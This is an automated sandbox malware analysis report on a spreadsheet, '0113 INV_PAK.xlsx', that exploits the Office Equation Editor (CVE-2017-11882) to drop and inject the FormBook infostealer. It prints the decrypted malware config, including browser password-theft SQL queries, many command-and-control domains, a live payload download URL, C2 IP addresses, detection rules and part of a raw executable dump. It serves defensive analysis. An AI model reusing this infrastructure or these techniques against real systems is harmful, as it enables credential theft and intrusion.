Loading ...

Play interactive tourEdit tour

Analysis Report 0113 INV_PAK.xlsx

Overview

General Information

Sample Name:0113 INV_PAK.xlsx
Analysis ID:344804
MD5:2fd9077e801ebc26d370c3b6798dd9c4
SHA1:5638f179b275bc14326c54bb2ffc038975a8288f
SHA256:1386b172ed5a75548288ebf6277603a5743dfc2cd42d6de3a57ff1418f7c0fb8
Tags:VelvetSweatshopxlsx

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1476 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 1604 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2692 cmdline: 'C:\Users\Public\vbc.exe' MD5: 2B72BC4BA9645AF5482661C5D1D1C7F8)
      • vbc.exe (PID: 2792 cmdline: C:\Users\Public\vbc.exe MD5: 2B72BC4BA9645AF5482661C5D1D1C7F8)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • help.exe (PID: 2828 cmdline: C:\Windows\SysWOW64\help.exe MD5: 0F488C73AA50C2FC1361F19E8FC19926)
            • cmd.exe (PID: 2768 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x79e0", "KEY1_OFFSET 0x1bbfe", "CONFIG SIZE : 0xc1", "CONFIG OFFSET 0x1bc5a", "URL SIZE : 24", "searching string pattern", "strings_offset 0x1a6a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x9ec330a", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70d3", "0x9f715026", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012172", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Mail\\", "\\Foxmail", "\\Storage\\", "\\Accounts\\Account.rec0", "\\Data\\AccCfg\\Accounts.tdat", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "calusaptamiami.com", "starlinkwebservices.com", "lakeviewbarbershonola.com", "oaklandraidersjerseyspop.com", "ohiotechreport.com", "eligetucafetera.com", "tu4343.com", "abstract-elearning.com", "thebabylashes.com", "athleteshive.com", "fanninhomesforless.com", "sembracna.com", "servicesyn.com", "bellairechoice.com", "tmpaas.com", "eyepaa.com", "stickerzblvd.com", "rentfs.com", "nadya-shanab.com", "microwgreens.net", "overnaut.net", "edwinstowingservices.com", "bonus189.space", "xn--wgbp0b73b.com", "trijjadigital.com", "libraspeed.com", "theofficialtoluwani.com", "podborauto.pro", "qyhualin.com", "prayerswithmary.com", "donboscohistorycorner.com", "enlightenedsoil.com", "osteopathegagny.com", "lookingglassland.com", "maglex.info", "foxandgraceboutique.com", "yourinfluencecoach.com", "com-cancel-payment-id655.com", "ppspiaggio.com", "dbsadv.com", "teamworkdash.com", "washington-election-2020.info", "creativehighagency.com", "artisthenewmeditation.com", "qsgasia.com", "unseen-vision.com", "beepybox.online", "shaffglowing.com", "teacher-retirement-info.info", "muabandatdonganh.com", "shuhan.design", "5200853.com", "shengmixiaoji.net", "spiderofthesea.com", "scionoflewisville.com", "tpcvirtual.com", "zhjiaxiang.com", "thefanexam.com", "kimscraftyresale.com", "housvest.com", "bukmyhotel.com", "lacaverne.ovh", "investorspredict.com", "quicklogosireland.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.inreachpt.com/gqx2/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2218235916.00000000001F0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.2218235916.00000000001F0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.2218235916.00000000001F0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.2218311056.0000000000330000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.2218311056.0000000000330000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.vbc.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.vbc.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.vbc.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        5.2.vbc.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.vbc.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1604, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2692
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.141.138.125, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1604, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1604, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
          Sigma detected: Executables Started in Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1604, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2692
          Sigma detected: Execution in Non-Executable FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1604, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2692
          Sigma detected: Suspicious Program Location Process StartsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1604, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2692

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://sndychnesqudusissnvx.dns.army/documengt/svchost.exeAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 5.2.vbc.exe.400000.1.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x79e0", "KEY1_OFFSET 0x1bbfe", "CONFIG SIZE : 0xc1", "CONFIG OFFSET 0x1bc5a", "URL SIZE : 24", "searching string pattern", "strings_offset 0x1a6a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x9ec330a", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70d3", "0x9f715026", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012172", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "-----------------------------
          Multi AV Scanner detection for submitted fileShow sources
          Source: 0113 INV_PAK.xlsxReversingLabs: Detection: 21%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.2218235916.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2218311056.0000000000330000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375584892.00000000003C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2218333156.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375310907.0000000000150000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2166013985.0000000003308000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375232552.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJoe Sandbox ML: detected
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: 5.2.vbc.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

          Compliance:

          barindex
          Uses new MSVCR DllsShow sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: wntdll.pdb source: vbc.exe, help.exe
          Source: Binary string: help.pdb source: vbc.exe, 00000005.00000002.2218383792.0000000000769000.00000004.00000020.sdmp
          Source: excel.exeMemory has grown: Private usage: 4MB later: 34MB
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop esi
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\help.exeCode function: 4x nop then pop esi
          Source: global trafficDNS query: name: sndychnesqudusissnvx.dns.army
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.141.138.125:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.141.138.125:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49165 -> 103.141.138.125:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 208.91.197.91:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 208.91.197.91:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 208.91.197.91:80
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 27 Jan 2021 06:30:02 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Wed, 27 Jan 2021 03:46:13 GMTETag: "df000-5b9d99cd20d8a"Accept-Ranges: bytesContent-Length: 913408Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e2 e1 10 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 e4 0d 00 00 0a 00 00 00 00 00 00 b6 02 0e 00 00 20 00 00 00 20 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 02 0e 00 4f 00 00 00 00 20 0e 00 cc 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 